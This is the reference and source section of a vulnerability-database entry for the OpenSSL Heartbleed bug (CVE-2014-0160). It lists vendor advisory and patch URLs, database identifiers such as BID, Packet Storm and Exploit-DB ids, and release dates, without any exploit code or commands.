url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095124 | Trust: 0.3 |
url: | https://blog.pfsense.org/?p=1253 | Trust: 0.3 |
url: | https://www.openssl.org/news/secadv_20140407.txt | Trust: 0.3 |
url: | http://www.synology.com/en-global/releasenote/model/ds114 | Trust: 0.3 |
url: | https://h20565.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?spf_p.tpst=kbdocdisplay&spf_p.prp_kbdocdisplay=wsrp-navigationalstate%3ddocid%253demr_na-c04236102-5%257cdoclocale%253d% | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004615 | Trust: 0.3 |
url: | http://support.apple.com/kb/ht6203 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670316 | Trust: 0.3 |
url: | http://blogs.intel.com/application-security/2014/04/10/intelr-expressway-service-gateway-heartbleed-security-update/ | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671783 | Trust: 0.3 |
url: | https://www.support.nec.co.jp/view.aspx?id=3010100835 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-126-01 | Trust: 0.3 |
url: | https://6d860c942a745b5a2e22-2435f2f08e773abe005b52170fce6d94.ssl.cf2.rackcdn.com/security/ruckus-security-advisory-041414.txt | Trust: 0.3 |
url: | http://btsc.webapps.blackberry.com/btsc/viewdocument.do?externalid=kb35882 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04262495 | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095143 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004616 | Trust: 0.3 |
url: | http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq?mode=18&id=3489 | Trust: 0.3 |
url: | http://blogs.citrix.com/2014/04/15/citrix-xenmobile-security-advisory-for-heartbleed/ | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671100 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04248997 | Trust: 0.3 |
url: | https://ics-cert.us-cert.gov/alerts/ics-alert-14-099-01c | Trust: 0.3 |
url: | http://forum.gta.com/forum/user-community-support/firewall-general/1463-openssl-heartbeat-heart-bleed-vulnerability-vu-720951-cve-2014-0160 | Trust: 0.3 |
url: | https://support.asperasoft.com/entries/50381253 | Trust: 0.3 |
url: | http://www.qnap.com/en/index.php?lang=en&sn=845&c=3034&sc=&n=21724 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670176 | Trust: 0.3 |
url: | http://www.sybase.com/detail?id=1099387 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04271396 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004599 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=nas8n1020021 | Trust: 0.3 |
url: | http://www.globalscape.com/file-sharing/ | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04260637 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-135-05 | Trust: 0.3 |
url: | http://www.symantec.com/business/support/index?page=content&id=tech216630 | Trust: 0.3 |
url: | https://kb.juniper.net/infocenter/index?page=content&id=jsa10623 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na- c04262472 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=isg3t1020715 | Trust: 0.3 |
url: | http://help.filemaker.com/app/answers/detail/a_id/13384/ | Trust: 0.3 |
url: | http://www.f-secure.com/en/web/labs_global/fsc-2014-1 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670560 | Trust: 0.3 |
url: | https://ics-cert.us-cert.gov/advisories/icsa-15-344-01 | Trust: 0.3 |
url: | http://winscp.net/eng/docs/history#5.5.3 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-126-01a | Trust: 0.3 |
url: | https://kc.mcafee.com/corporate/index?page=content&id=sb10071 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04272594 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21666414 | Trust: 0.3 |
url: | https://www-304.ibm.com/connections/blogs/psirt/entry/security_vulnerabilities_have_been_discovered_in_the_openssl_libraries_which_a_customer_may_use_with_cloudant?lang=en_us | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2015/mar/84 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004661 | Trust: 0.3 |
url: | http://www-304.ibm.com/support/docview.wss?uid=isg3t1020707 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670864 | Trust: 0.3 |
url: | https://www.nomachine.com/forums/topic/nomachine-version-4-2-19-now-available | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670738 | Trust: 0.3 |
url: | http://nvidia.custhelp.com/app/answers/detail/a_id/3492 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04263236 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037384 | Trust: 0.3 |
url: | https://downloads.avaya.com/css/p8/documents/100179670 | Trust: 0.3 |
url: | http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-18.html | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004632 | Trust: 0.3 |
url: | http://www.netwinsite.com/surgemail/help/updates.htm | Trust: 0.3 |
url: | https://support.microsoft.com/kb/2962393 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670301 | Trust: 0.3 |
url: | http://files.trendmicro.com/documentation/readme/osce%20docs/critical%20patch%201044%20readme.txt | Trust: 0.3 |
url: | http://www.kb.cert.org/vuls/id/720951 | Trust: 0.3 |
url: | http://www.libreoffice.org/about-us/security/advisories/cve-2014-0160/ | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04273303 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670485 | Trust: 0.3 |
url: | https://www.python.org/download/releases/3.4.1 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04239375 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670060 | Trust: 0.3 |
url: | http://blogs.sophos.com/2014/04/09/sophos-utm-manager-and-openssl-vulnerability/ | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671127 | Trust: 0.3 |
url: | https://security-center.intel.com/advisory.aspx?intelid=intel-sa-00037&languageid=en-fr | Trust: 0.3 |
url: | http://www.kerio.com/support/kerio-control/release-history | Trust: 0.3 |
url: | http://www.cerberusftp.com/products/releasenotes.html | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04259321 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04250814 | Trust: 0.3 |
url: | http://ftp.openbsd.org/pub/openbsd/patches/5.3/common/014_openssl.patch | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004582 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671096 | Trust: 0.3 |
url: | http://www.sonicwall.com/us/shared/download/ell_sonicwall_-_support_bulletin_-_cve-20140-1016_openssl_large_heartbeat_response_vulnerability.pdf | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04249113 | Trust: 0.3 |
url: | http://openssl.org/ | Trust: 0.3 |
url: | http://kb.juniper.net/infocenter/index?page=content&id=jsa10623&cat=sirt_1&actp=list | Trust: 0.3 |
url: | http://www.blackberry.com/btsc/kb35955 | Trust: 0.3 |
url: | https://www.adtran.com/pub/library/security%20advisory/adtsa-hb1001-20140410.pdf | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671197 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=nas8n1020034 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04236062 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037391 | Trust: 0.3 |
url: | https://documentsmart.com/security/wp-content/uploads/2014/04/cert_heartbleed-openssl_vulnerability_document_v1.31.pdf | Trust: 0.3 |
url: | http://www.sophos.com/en-us/support/knowledgebase/120854.aspx | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21674447 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670302 | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095203 | Trust: 0.3 |
url: | http://www.pexip.com/sites/pexip/files/cve-2014-0160_security_bulletin_2014-04-09_1.pdf | Trust: 0.3 |
url: | https://ics-cert.us-cert.gov/alerts/ics-alert-14-099-01a | Trust: 0.3 |
url: | https://h20565.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?spf_p.tpst=kbdocdisplay&spf_p.prp_kbdocdisplay=wsrp-navigationalstate%3ddocid%253demr_na-c04239375-2%257cdoclocale%253d% | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671954 | Trust: 0.3 |
url: | https://community.rapid7.com/docs/doc-2736 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037393 | Trust: 0.3 |
url: | http://www.getchef.com/blog/2014/04/09/chef-server-11-0-12-release/ | Trust: 0.3 |
url: | http://webserver.docs.gopivotal.com/security/cve-2014-0160-advisory.pdf | Trust: 0.3 |
url: | http://blogs.opera.com/security/2014/04/heartbleed-heartaches/ | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2014/apr/129 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671128 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037380 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21669666 | Trust: 0.3 |
url: | https://ics-cert.us-cert.gov/alerts/ics-alert-14-099-01f | Trust: 0.3 |
url: | http://www.vmware.com/security/advisories/vmsa-2014-0004.html | Trust: 0.3 |
url: | https://www.barracuda.com/blogs/pmblog?bid=2279#.u012w_msyso | Trust: 0.3 |
url: | https://www.stunnel.org/sdf_changelog.html | Trust: 0.3 |
url: | http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670300 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670339 | Trust: 0.3 |
url: | https://code.google.com/p/mod-spdy/ | Trust: 0.3 |
url: | http://kb.juniper.net/infocenter/index?page=content&id=kb29007 | Trust: 0.3 |
url: | http://www.freebsd.org/security/advisories/freebsd-sa-14:06.openssl.asc | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004611 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004577 | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2014/apr/131 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670164 | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095144 | Trust: 0.3 |
url: | http://www.getchef.com/blog/2014/04/09/enterprise-chef-11-1-3-release/ | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-105-03b | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04236102 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04267775 | Trust: 0.3 |
url: | http://www.websense.com/content/support/library/ni/shared/security-alerts/openssl-vul-2014.pdfweb | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04264595 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670750 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04286049 | Trust: 0.3 |
url: | http://heartbleed.com/ | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095187 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-105-02 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04268240 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=nas3bf6e25d1260a4de686257cc100631528 | Trust: 0.3 |
url: | https://gist.github.com/sh1n0b1/10100394 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=isg3t1020683 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-135-04 | Trust: 0.3 |
url: | http://freecode.com/projects/palantir-server/releases/363060 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671059 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/alerts/ics-alert-14-099-01b | Trust: 0.3 |
url: | http://support.citrix.com/article/ctx140605 | Trust: 0.3 |
url: | https://rhn.redhat.com/errata/rhsa-2014-0416.html | Trust: 0.3 |
url: | http://www.ibm.com/support/docview.wss?uid=swg21686583 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671098 | Trust: 0.3 |
url: | https://www-304.ibm.com/support/docview.wss?uid=swg21670640 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-105-03a | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04267749 | Trust: 0.3 |
url: | https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid={967f13f1-5720-4592-9beb-42ad69ea14dc} | Trust: 0.3 |
url: | http://www.fortiguard.com/advisory/fg-ir-14-011/ | Trust: 0.3 |
url: | https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=&solutionid=sk100173&src=securityalerts | Trust: 0.3 |
url: | http://googleonlinesecurity.blogspot.com/2014/04/google-services-updated-to-address.html | Trust: 0.3 |
url: | http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-105-03 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670203 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04236062 | Trust: 0.3 |
url: | https://www-304.ibm.com/support/docview.wss?uid=swg21669907 | Trust: 0.3 |
url: | https://kb.bluecoat.com/index?page=content&id=sa79&actp=list | Trust: 0.3 |
url: | https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140423-0_wd_arkeia_path_traversal_v10.txt | Trust: 0.3 |
url: | http://blogs.sophos.com/2014/04/09/utm-up2date-9-111-released-fix-for-openssl-vulnerability-heartbleed/ | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037383 | Trust: 0.3 |
url: | https://www.whatsupgold.com/blog/2014/04/10/ipswitchs-response-heartbleed-ssl-vulnerability/ | Trust: 0.3 |
url: | http://openvpn.net/index.php/open-source/downloads.html | Trust: 0.3 |
url: | http://www.maxum.com/rumpus/blog/sslvulnerabilities.html | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2014/apr/136 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04268239 | Trust: 0.3 |
url: | http://support.attachmate.com/techdocs/2724.html | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04263038 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21673481 | Trust: 0.3 |
url: | http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-332187.htm | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670576 | Trust: 0.3 |
url: | https://www-304.ibm.com/support/docview.wss?uid=swg21670750 | Trust: 0.3 |
url: | http://learn.extremenetworks.com/rs/extreme/images/cert_vu%23720951_vulnerability_advisory_04_11_2014v2.pdf | Trust: 0.3 |
url: | http://www.nowsms.com/heartbeat-ssltls-fix-for-nowsms | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na- c04262670 | Trust: 0.3 |
url: | https://rhn.redhat.com/errata/rhsa-2014-0377.html | Trust: 0.3 |
url: | http://www.splunk.com/view/sp-caaamb3 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04239372 | Trust: 0.3 |
url: | http://support.attachmate.com/techdocs/2725.html | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=isg3t1020714&aid=1 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670858 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670018 | Trust: 0.3 |
url: | http://www.arubanetworks.com/support/alerts/aid-040814.asc | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037382 | Trust: 0.3 |
url: | http://www.bmc.com/support/support-news/openssl_cve-2014-0160.html | Trust: 0.3 |
url: | http://www.symantec.com/business/support/index?page=content&id=tech216558 | Trust: 0.3 |
url: | http://www.soliton.co.jp/support/news/important/20140410.html | Trust: 0.3 |
url: | http://www.symantec.com/business/support/index?page=content&id=tech216555 | Trust: 0.3 |
url: | http://tomcat.apache.org/native-doc/miscellaneous/changelog.html | Trust: 0.3 |
url: | http://help.filemaker.com/app/answers/detail/a_id/13386/ | Trust: 0.3 |
url: | http://www.vandyke.com/support/advisory/2014/05/index.html | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004643 | Trust: 0.3 |
url: | https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_openssl5 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=nas3824bd213d0f7c3d086257cc10063152c | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04307186 | Trust: 0.3 |
url: | http://scn.sap.com/community/sql-anywhere/blog/2014/04/11/openssl-heartbleed-and-sql-anywhere | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671130 | Trust: 0.3 |
url: | http://kb.globalscape.com/knowledgebasearticle11166.aspx | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04272892 | Trust: 0.3 |
url: | https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-april/000184.html | Trust: 0.3 |
url: | http://watchguardsecuritycenter.com/2014/04/09/11-8-3-update-1-now-available-to-fix-heartbleed-vulnerabilty-in-fireware-xtm-os/ | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04275280 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-128-01 | Trust: 0.3 |
url: | http://www.trianglemicroworks.com/products/scada-data-gateway/what%27s-new | Trust: 0.3 |
url: | https://downloads.avaya.com/css/p8/documents/100179858 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04255796 | Trust: 0.3 |
url: | http://www.atvise.com/en/news-events/news/260-important-security-update-heartbleed-bug | Trust: 0.3 |
url: | https://support.norton.com/sp/en/us/home/current/solutions/v98431836_enduserprofile_en_us | Trust: 0.3 |
url: | http://support.citrix.com/article/ctx140698 | Trust: 0.3 |
url: | https://h20566.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?spf_p.tpst=kbdocdisplay&spf_p.prp_kbdocdisplay=wsrp-navigationalstate%3ddocid%253demr_na-c04260456-2%257cdoclocale%253de | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670640 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670388 | Trust: 0.3 |
url: | http://support.kaspersky.com/10235#block0 | Trust: 0.3 |
url: | https://bitcoin.org/en/release/v0.9.1 | Trust: 0.3 |
url: | https://kb.juniper.net/infocenter/index?page=content&id=jsa10623&cat=sirt_1&actp=list&showdraft=false | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21672507 | Trust: 0.3 |
url: | http://support.attachmate.com/techdocs/1708.html | Trust: 0.3 |
url: | http://www.websense.com/content/support/library/ni/shared/security-alerts/openssl-vul-2014.pdf | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670015 | Trust: 0.3 |
url: | http://www.enterprisedb.com/products-services-training/pgdownload | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2014/apr/139 | Trust: 0.3 |
url: | https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00 | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095066 | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2014/apr/138 | Trust: 0.3 |
SOURCES
db: | BID | id: | 66690 |
db: | PACKETSTORM | id: | 126072 |
db: | PACKETSTORM | id: | 126308 |
db: | PACKETSTORM | id: | 126288 |
db: | PACKETSTORM | id: | 126090 |
db: | PACKETSTORM | id: | 126065 |
db: | PACKETSTORM | id: | 126048 |
db: | PACKETSTORM | id: | 126069 |
db: | PACKETSTORM | id: | 151177 |
db: | PACKETSTORM | id: | 126102 |
db: | PACKETSTORM | id: | 126070 |
db: | PACKETSTORM | id: | 126100 |
db: | PACKETSTORM | id: | 126272 |
db: | PACKETSTORM | id: | 126101 |
db: | EXPLOIT-DB | id: | 32764 |
db: | EDBNET | id: | 21855 |
db: | EDBNET | id: | 78335 |
db: | EDBNET | id: | 80511 |
db: | EDBNET | id: | 54281 |
db: | EDBNET | id: | 21866 |
LAST UPDATE DATE
2022-06-21T14:08:19.733000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 66690 | date: | 2016-07-06T14:40:00 |
SOURCES RELEASE DATE
db: | BID | id: | 66690 | date: | 2014-04-07T00:00:00 |
db: | PACKETSTORM | id: | 126072 | date: | 2014-04-09T22:35:29 |
db: | PACKETSTORM | id: | 126308 | date: | 2014-04-24T22:39:43 |
db: | PACKETSTORM | id: | 126288 | date: | 2014-04-23T13:03:33 |
db: | PACKETSTORM | id: | 126090 | date: | 2014-04-09T22:58:03 |
db: | PACKETSTORM | id: | 126065 | date: | 2014-04-08T22:48:10 |
db: | PACKETSTORM | id: | 126048 | date: | 2014-04-08T21:17:48 |
db: | PACKETSTORM | id: | 126069 | date: | 2014-04-09T02:10:44 |
db: | PACKETSTORM | id: | 151177 | date: | 2019-01-16T15:09:40 |
db: | PACKETSTORM | id: | 126102 | date: | 2014-04-10T19:03:43 |
db: | PACKETSTORM | id: | 126070 | date: | 2014-04-08T14:04:44 |
db: | PACKETSTORM | id: | 126100 | date: | 2014-04-10T03:13:49 |
db: | PACKETSTORM | id: | 126272 | date: | 2014-04-23T06:15:25 |
db: | PACKETSTORM | id: | 126101 | date: | 2014-04-10T15:06:42 |
db: | EXPLOIT-DB | id: | 32764 | date: | 2014-04-09T00:00:00 |
db: | EDBNET | id: | 21855 | date: | 2014-04-09T00:00:00 |
db: | EDBNET | id: | 78335 | date: | 2014-04-16T00:00:00 |
db: | EDBNET | id: | 80511 | date: | 2015-04-23T00:00:00 |
db: | EDBNET | id: | 54281 | date: | 2014-04-09T00:00:00 |
db: | EDBNET | id: | 21866 | date: | 2014-04-10T00:00:00 |